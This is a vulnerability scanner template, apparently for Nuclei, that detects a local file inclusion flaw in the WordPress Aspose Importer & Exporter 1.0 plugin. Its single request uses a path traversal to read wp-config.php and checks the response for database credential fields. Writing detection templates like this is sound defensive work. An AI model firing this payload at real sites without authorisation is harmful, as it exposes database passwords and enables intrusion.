id: aspose-ie-file-download

info:
  name: WordPress Aspose Importer & Exporter 1.0 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: WordPress Aspose Importer & Exporter version 1.0 is vulnerable to local file inclusion.
  reference:
    - https://packetstormsecurity.com/files/131162/
    - https://wordpress.org/plugins/aspose-importer-exporter
  metadata:
    max-request: 1
  tags: aspose,packetstorm,wordpress,wp-plugin,lfi

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and

      - type: status
        status:
          - 200

# digest: 4a0a0047304502203ceeb09441eaad10272aa334e9fd09c47e3f6f909f6060d1c782ffdee7feecbb022100c0830767ee989bec661fdaab8052e5e6085f699fb1c04d11e4c24eae52293781:922c64590222798bb761d5b6d8e72950